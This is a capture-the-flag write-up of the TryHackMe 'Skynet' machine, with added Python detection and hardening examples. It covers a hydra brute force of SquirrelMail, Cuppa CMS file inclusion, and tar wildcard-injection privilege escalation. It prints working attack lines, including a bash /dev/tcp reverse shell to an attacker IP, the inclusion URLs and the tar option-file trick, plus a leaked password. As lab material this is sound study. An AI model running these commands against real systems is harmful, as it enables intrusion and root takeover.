Skynet writeup [thm]
![Skynet pic](../../images/skynet.jpg)
A vulnerable Terminator-themed Linux machine.
Skynet... So much for getting cocky after solving Simple CTF so easily. Skynet gave me a lot more trouble.
What is Miles password for his emails?
This took me some time to figure out.
```
$: nmap -A -p- $target
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 22:11 CEST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 7.57% done; ETC: 22:13 (0:01:50 remaining)
Nmap scan report for $target
Host is up (0.047s latency).
Not shown: 65529 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: RESP-CODES TOP AUTH-RESP-CODE PIPELINING SASL CAPA UIDL
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: ID more LOGINDISABLEDA0001 post-login LITERAL+ listed have LOGIN-REFERRALS Pre-login OK capabilities SASL-IR ENABLE IMAP4rev1 IDLE
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m48s, deviation: 2h53m12s, median: -11s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-05-13T15:12:22-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-05-13T20:12:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.67 seconds
```
There's a lot of stuff going on here.
We start by visiting the web server in a browser. It's just a non-functional search engine containing no useful information. Are there any other pages?
Gobuster:
```
$: gobuster dir -u $target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://$target
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/13 22:55:07 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 312] [--> http://$target/admin/]
/css                  (Status: 301) [Size: 310] [--> http://$target/css/]
/js                   (Status: 301) [Size: 309] [--> http://$target/js/]
/config               (Status: 301) [Size: 313] [--> http://$target/config/]
/ai                   (Status: 301) [Size: 309] [--> http://$target/ai/]
/squirrelmail         (Status: 301) [Size: 319] [--> http://$target/squirrelmail/]
/server-status        (Status: 403) [Size: 277]
Progress: 141981 / 220561 (64.37%)
===============================================================
2021/05/13 23:14:21 Finished
```
Let's keep this information in mind.
We also want to enumerate Samba:
```
$: enum4linux -A $target > enum_samba

 =========================================
|    Share Enumeration on $target    |
 =========================================

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))

 =====================================
|    Session Check on $target    |
 =====================================
[+] Server $target allows sessions using username '', password ''
```
We got a username!
Checking out the anonymous share is a good place to start:
```
$: smbclient //$target/anonymous
```
Here we find a file:
```
$: cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.

-Miles Dyson
```
Hmmm, can we use this intel to our advantage somehow?
There's also a directory with logs:
```
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 06:42:16 2019
  ..                                  D        0  Thu Nov 26 17:04:00 2020
  log2.txt                            N        0  Wed Sep 18 06:42:13 2019
  log1.txt                            N      471  Wed Sep 18 06:41:59 2019
  log3.txt                            N        0  Wed Sep 18 06:42:16 2019

		9204224 blocks of size 1024. 5831504 blocks available
smb: \logs\>
```
Let's get log1.txt and have a look at it:
```
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
```
It looks like this could be a list of potential passwords.
It's worth a shot to run this list against milesdyson's private Samba share, but no luck there. However, gobuster revealed http://$target/squirrelmail/. Maybe one or more entries in this list are passwords for his email account?
Manually trying 31 passwords sounds tedious, so we let hydra do the heavy lifting for us.
By looking at the source code for the squirrelmail login page and taking note of the names of the username and password input fields (login_username and secretkey), we can craft a command that lets hydra automagically try all of the passwords for us:
```
$: hydra -t 1 -l milesdyson -P log1.txt $target http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^:F=incorrect" -vV
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these fucks ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-13 23:13:37
[DATA] max 1 task per 1 server, overall 1 task, 31 login tries (l:1/p:31), ~31 tries per task
[DATA] attacking http-post-form://$target:80/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^:F=incorrect
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target $target - login "milesdyson" - pass "cyborg007haloterminator" - 1 of 31 [child 0] (0/0)
[80][http-post-form] host: $target   login: milesdyson   password: cyborg007haloterminator
[STATUS] attack finished for $target (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-13 23:13:38
```
In other words, it worked!
Using these credentials we can now log in to his email account.
What is the hidden directory?
Looking through his emails we find:
```
Subject: Samba Password reset
From: skynet@skynet
Date: Tue, September 17, 2019 10:10 pm
Priority: Normal
Options: View Full Header  View Printable Version  Download this as a file

We have changed your smb password after system malfunction.
Password: [REDACTED]
```
And another strange email:
```
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110 01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
```
Which converts to:
```
balls have zero to me to me to me to me to me to me to me to me to
```
And yet another weird one:
```
i can i i everything else . . . . . . . . . . . . . . balls have zero to me to me to me to me to me to me to me to me to you i everything else . . . . . . . . . . . . . . balls have a ball to me to me to me to me to me to me to me i i can i i i everything else . . . . . . . . . . . . . . balls have a ball to me to me to me to me to me to me to me i . . . . . . . . . . . . . . . . . . . balls have zero to me to me to me to me to me to me to me to me to you i i i i i everything else . . . . . . . . . . . . . . balls have 0 to me to me to me to me to me to me to me to me to you i i i everything else . . . . . . . . . . . . . . balls have zero to me to me to me to me to me to me to me to me to
```
Both of the bizarre emails are from serenakogan@skynet. Is this a clue or just nonsense? Might come in handy later on, or not.
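The binary e-mail above is just ASCII written out as 8-bit groups. The decoder below is an added example, not part of the original writeup: it parses that format strictly (every token must be exactly eight 0/1 characters, so a stray character in a copied message raises an error instead of producing silently garbled text) and includes a small triage helper for deciding whether a message body is worth decoding at all. The SAMPLE string is the opening of the quoted e-mail.

```python
# Added example (not from the original writeup): decode space-separated
# 8-bit binary groups, like the odd Skynet e-mail, into ASCII text.
import re

# Constructed sample: the first ten groups of the e-mail quoted above.
SAMPLE = ("01100010 01100001 01101100 01101100 01110011 00100000 "
          "01101000 01100001 01110110 01100101")

def decode_binary_text(blob: str) -> str:
    """Turn a run of 8-bit binary groups into text.

    Tokens are split on whitespace. Anything that is not exactly eight 0/1
    characters is rejected rather than skipped, so corruption in a copied
    message surfaces as an error instead of a wrong decode.
    """
    out = []
    for tok in blob.split():
        if not re.fullmatch(r"[01]{8}", tok):
            raise ValueError(f"not an 8-bit group: {tok!r}")
        out.append(chr(int(tok, 2)))
    return "".join(out)

def looks_like_binary_text(blob: str) -> bool:
    """Triage check for a message body: True when it consists only of
    8-bit binary groups and decodes to printable ASCII."""
    try:
        text = decode_binary_text(blob)
    except ValueError:
        return False
    return bool(text) and all(32 <= ord(c) < 127 for c in text)

if __name__ == "__main__":
    print(decode_binary_text(SAMPLE))
```

Running the block prints the decoded opening of the message; feeding it the full e-mail body yields the sentence shown above.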
In any case, we got the Samba password, nice!
We will now log in to milesdyson's personal Samba share. Since the password contains some funky characters, we stuff it away in a variable.
```
$: pw=')s{A&2Z=F^n_E.B`'
$: smbclient -U milesdyson \\\\$target\\milesdyson $pw
Try "help" to get a list of possible commands.
smb: \>
smb: \> ls
  .                                                   D        0  Tue Sep 17 11:05:47 2019
  ..                                                  D        0  Wed Sep 18 05:51:03 2019
  Improving Deep Neural Networks.pdf                  N  5743095  Tue Sep 17 11:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf  N 12927230  Tue Sep 17 11:05:14 2019
  Convolutional Neural Networks-CNN.pdf               N 19655446  Tue Sep 17 11:05:14 2019
  notes                                               D        0  Tue Sep 17 11:18:40 2019
  Neural Networks and Deep Learning.pdf               N  4304586  Tue Sep 17 11:05:14 2019
  Structuring your Machine Learning Project.pdf       N  3531427  Tue Sep 17 11:05:14 2019

smb: \> cd notes\
smb: \notes\> ls
  .                                   D        0  Tue Sep 17 11:18:40 2019
  ..                                  D        0  Tue Sep 17 11:05:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 11:01:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 11:01:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 11:01:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 11:01:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 11:01:29 2019
  important.txt                       N      117  Tue Sep 17 11:18:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 11:01:29 2019
  3.00 Artificial Intelligence.md     N       33  Tue Sep 17 11:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 11:01:29 2019
  3.02 Planning.md                    N    71657  Tue Sep 17 11:01:29 2019
  1.04 Probability.md                 N    62712  Tue Sep 17 11:01:29 2019
  2.06 Natural Language Processing.md N    82633  Tue Sep 17 11:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 11:01:29 2019
  1.03 Calculus.md                    N    40779  Tue Sep 17 11:01:29 2019
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 11:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 11:01:29 2019
  6.00 Appendices.md                  N       20  Tue Sep 17 11:01:29 2019
  1.01 Functions.md                   N     7627  Tue Sep 17 11:01:29 2019
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 11:01:29 2019
  2.04 Model Selection.md             N    33383  Tue Sep 17 11:01:29 2019
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 11:01:29 2019
  4.00 Simulation.md                  N       20  Tue Sep 17 11:01:29 2019
  3.05 In Practice.md                 N     1123  Tue Sep 17 11:01:29 2019
  1.07 Graphs.md                      N     5110  Tue Sep 17 11:01:29 2019
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 11:01:29 2019
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 11:01:29 2019
  5.03 Anonymization.md               N     2516  Tue Sep 17 11:01:29 2019
  5.01 Process.md                     N     5788  Tue Sep 17 11:01:29 2019
  1.09 Optimization.md                N    25823  Tue Sep 17 11:01:29 2019
  1.05 Statistics.md                  N    64291  Tue Sep 17 11:01:29 2019
  5.02 Visualization.md               N      940  Tue Sep 17 11:01:29 2019
  5.00 In Practice.md                 N       21  Tue Sep 17 11:01:29 2019
  4.02 Nonlinear Dynamics.md          N    44601  Tue Sep 17 11:01:29 2019
  1.10 Algorithms.md                  N    28790  Tue Sep 17 11:01:29 2019
  3.04 Filtering.md                   N    13360  Tue Sep 17 11:01:29 2019
  1.00 Foundations.md                 N       22  Tue Sep 17 11:01:29 2019

		9204224 blocks of size 1024. 5810256 blocks available
```
We download and inspect important.txt:
```
1. Add features to beta CMS /[REDACTED]
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
```
If we visit http://$target/[REDACTED]/ we see that this is Miles Dyson's personal page.
Dr. Miles Bennett Dyson was the original inventor of the neural-net processor which would lead to the development of Skynet, a computer A.I. intended to control electronically linked weapons and defend the United States.
Hidden directory uncovered!
What is the vulnerability called when you can include a remote file for malicious purposes?
Remote file inclusion (RFI).
A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic directory traversal attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file inclusion vulnerability will result in remote code execution on the web server that runs the affected web application. An attacker can use remote code execution to create a web shell on the web server, which can be used for website defacement.
What is the user flag?
Doing a gobuster search on the hidden directory /[REDACTED] we find an administrator page running Cuppa CMS. The previous question gives us a hint that we should be on the lookout for RFIs.
By searching for Cuppa CMS RFI vulnerabilities in exploit-db we find Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion by the CWH Underground Hacking Team.
```
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability.
User tainted data is used when creating the file name that will be included into the current file.
PHP code in this file will be evaluated, non-PHP code will be embedded to the output.
This vulnerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
```
This exploit is pretty damn cool!
e.g.:
```
$: curl -s http://$target/[REDACTED]/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
<script>
function CloseDefaultAlert(){
  SetAlert(false, "", "#alert");
  setTimeout(function () {SetBlockade(false)}, 200);
}
function ShowAlert(){
  _width = '';
  _height = '';
  jQuery('#alert').animate({width:parseInt(_width), height:parseInt(_height), 'margin-left':-(parseInt(_width)*0.5)+20, 'margin-top':-(parseInt(_height)*0.5)+20 }, 300, "easeInOutCirc", CompleteAnimation);
  function CompleteAnimation(){
    jQuery("#btnClose_alert").css('visibility', "visible");
    jQuery("#description_alert").css('visibility', "visible");
    jQuery("#content_alert").css('visibility', "visible");
  }
}
</script>
<div class="alert_config_field" id="alert" style="z-index:;">
  <div class="btnClose_alert" id="btnClose_alert" onclick="javascript:CloseDefaultAlert();"></div>
  <div class="description_alert" id="description_alert"><b>Field configuration: </b></div>
  <div class="separator" style="margin-bottom:15px;"></div>
  <div id="content_alert" class="content_alert">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
  </div>
</div>
```
Not bad, huh?
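Both of the web-side steps so far, the hydra run against SquirrelMail's login.php and the traversal through alertConfigField.php's urlConfig parameter, leave distinctive traces in the web server's access log. The following is an added detection example, not code from the writeup or from any of the tools it uses: it parses Apache combined-format log lines, flags a source IP that POSTs to the login endpoint more than a threshold number of times, and flags query-string values that contain traversal sequences (including double-encoded ones) or a remote URL scheme. The log lines, IP addresses and the HIDDEN_DIR path component are all constructed for the example; the threshold of five is an assumed tuning value.

```python
# Added example (not part of the original writeup): detect the two request
# patterns from this writeup in Apache combined access log lines.
import re
from collections import Counter
from urllib.parse import unquote, urlsplit, parse_qsl

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log: six failed logins and one success from one IP,
# an unrelated request, and three file-inclusion probes (plain traversal,
# remote URL, double-encoded traversal). HIDDEN_DIR stands in for the
# directory the writeup redacts.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/May/2021:23:13:37 +0200] "POST /squirrelmail/src/login.php HTTP/1.1" 200 2101',
] * 6 + [
    '10.0.0.5 - - [13/May/2021:23:13:38 +0200] "POST /squirrelmail/src/login.php HTTP/1.1" 302 0',
    '10.0.0.9 - - [13/May/2021:23:20:01 +0200] "GET /index.html HTTP/1.1" 200 523',
    '10.0.0.5 - - [13/May/2021:23:41:10 +0200] "GET /HIDDEN_DIR/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd HTTP/1.1" 200 3322',
    '10.0.0.5 - - [13/May/2021:23:42:55 +0200] "GET /HIDDEN_DIR/administrator/alerts/alertConfigField.php?urlConfig=http://10.0.0.5:8000/php-reverse-shell.php HTTP/1.1" 200 0',
    '10.0.0.7 - - [13/May/2021:23:50:00 +0200] "GET /HIDDEN_DIR/administrator/alerts/alertConfigField.php?urlConfig=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 3322',
]

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (..%252f -> ..%2f -> ../) so that
    double-encoded traversal is compared in the same form as plain traversal."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def inclusion_indicators(url):
    """Return (param, reason) pairs for query values that look like file
    inclusion attempts: a traversal sequence or a remote/wrapper URL scheme."""
    hits = []
    for key, val in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        v = fully_decode(val)
        if "../" in v or "..\\" in v:
            hits.append((key, "path traversal"))
        elif re.match(r"(?i)^(https?|ftp|php|data)://", v):
            hits.append((key, "remote URL"))
    return hits

def login_bursts(entries, path="/squirrelmail/src/login.php", threshold=5):
    """Count POSTs to the login endpoint per source IP; return those at or
    above the threshold (assumed value) with their counts."""
    c = Counter(e["ip"] for e in entries if e["method"] == "POST" and e["url"] == path)
    return {ip: n for ip, n in c.items() if n >= threshold}

def scan(lines):
    """Run both detections over raw log lines and return (ip, finding) tuples."""
    entries = [e for e in map(parse_line, lines) if e]
    findings = []
    for ip, n in login_bursts(entries).items():
        findings.append((ip, f"{n} POSTs to login endpoint"))
    for e in entries:
        for param, reason in inclusion_indicators(e["url"]):
            findings.append((e["ip"], f"{reason} in parameter {param!r}"))
    return findings

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(f"{ip}: {finding}")
```

The login-burst rule deliberately counts requests rather than failures: SquirrelMail answers a bad login with a 200 and the page text "incorrect" (which is why hydra's F=incorrect marker works), so status codes alone do not separate failures from successes. The inclusion rule decodes before matching so that `..%252f` and `../` are treated the same.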
We can use this to get a PHP reverse shell going.
Set a suitable port and change the IP address in the script, then serve it up. I used my private server, but in hindsight I should have gone with the famous Python one-liner:
```
$: python3 -m http.server 8000
```
Start listening:
```
$: listening on [any] 1234 ...
```
Now, go to the following URL in a web browser:
```
http://$target/[REDACTED]/administrator/alerts/alertConfigField.php?urlConfig=http://$pathTo/php-reverse-shell.php
```
We have a shell! It's unprivileged but it's a good start.
```
$: cd /home/milesdyson
$: ls
backups  mail  share  user.txt
$: cat user.txt
[REDACTED]
```
What is the root flag?
As always, the best part! How can we go from a simpleton user like www-data to root?
In the home directory of milesdyson we find a backup script that grabs the contents of /var/www/html. Looking in the crontab entries we see that this script is run as root!
The backup script uses tar, and GTFOBins tells us how to abuse that to escalate our privileges and get a root shell:
```
$: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
```
The following is a sneaky way of getting a root shell. We will trick the machine into giving us a privileged reverse shell.
```
$: printf '#!/bin/bash\nbash -i >& /dev/tcp/$yourip/1235 0>&1' > /var/www/html/shell
$: chmod +x /var/www/html/shell
$: touch /var/www/html/--checkpoint=1
$: touch /var/www/html/--checkpoint-action=exec=bash\ shell
```
This will fool tar into executing the file shell with the needed options and open a TCP connection to our own machine, where we have netcat eagerly awaiting any incoming connection.
```
$: nc -lvp 1235
listening on [any] 1235 ...
$target: inverse host lookup failed: Unknown host
connect to [$yourip] from (UNKNOWN) [$target] 49660
bash: cannot set terminal process group (4662): Inappropriate ioctl for device
bash: no job control in this shell
root@skynet:/var/www/html#
```
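The trick works because the backup script lets the shell expand a wildcard inside a directory that an unprivileged user can write to, so file names beginning with `--` arrive in tar's argument list and are parsed as options. The following is an added example, not the machine's backup script or code from the writeup: an audit function that lists option-shaped entries in a directory a root cron job is about to archive, and a builder for a tar invocation that cannot be steered this way (no glob, `-C` to enter the directory, and `--` so the single operand `.` is never read as an option). The temporary directory, file names and archive path are constructed for the example.

```python
# Added example (not part of the original writeup): audit a directory that a
# privileged cron job archives with tar, and build an invocation that keeps
# entry names out of tar's option parser.
import os
import tempfile

def option_like_names(directory):
    """Return entries in `directory` whose names begin with '-'.

    When a script runs `tar cf out.tar *` in that directory, the shell
    expands such names into the argument list and tar treats them as
    options (for example --checkpoint-action=exec=...)."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))

def safe_tar_argv(directory, archive):
    """Build a tar argv that archives `directory` without a shell glob:
    `-C` enters the directory and `--` ends option parsing, so the only
    operand is `.` and entry names are archived as members, never parsed."""
    return ["tar", "-cf", archive, "-C", directory, "--", "."]

def demo():
    """Constructed scenario: a web root with one legitimate file and two
    option-shaped names like the ones planted in this writeup."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("index.html", "--checkpoint=1",
                     "--checkpoint-action=exec=bash shell"):
            open(os.path.join(d, name), "w").close()
        flagged = option_like_names(d)
        argv = safe_tar_argv(d, "/tmp/backup.tar")  # assumed archive path
        return flagged, argv

if __name__ == "__main__":
    flagged, argv = demo()
    print("suspicious entries:", flagged)
    print("safe command:", " ".join(argv))
```

The audit is cheap enough to run from the backup job itself before archiving, and it only needs `os.listdir`, so it works for any directory the job is pointed at. The larger fix is the one the writeup implies: a root cron job should not archive a directory that www-data can write to without the `--` separator and an explicit operand.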
Now:
```
root@skynet:/var/www/html# cd /root
root@skynet:~# cat root.txt
[REDACTED]
```
Hasta la vista, baby.
Conclusion
This was frustrating and challenging but lots of fun. I got stuck a couple of times and felt really stupid because I "should" be able to solve this quickly. I then took a step back and I eventually got it.
I'm not very comfortable with Samba since I don't use it very much, but it's good to be exposed to it and to be forced to learn new things.
Sadly, I didn't manage to figure out the privesc on my own. I got to the point where I had the necessary tar command, but I needed a hint on how to tie it all together with the reverse shell and creating the files corresponding to the tar switches. Now I know how to do this in the future.
I assumed that this challenge would be really easy but that was not the case for me. Quite a wild ride and I learned some cool things along the way.
Tools used:
- Nmap
- Enum4linux
- Smbclient
- Gobuster
- Hydra
- Exploitdb
- Netcat
- php-reverse-shell.php
- GTFOBins
- Tar
- Crontab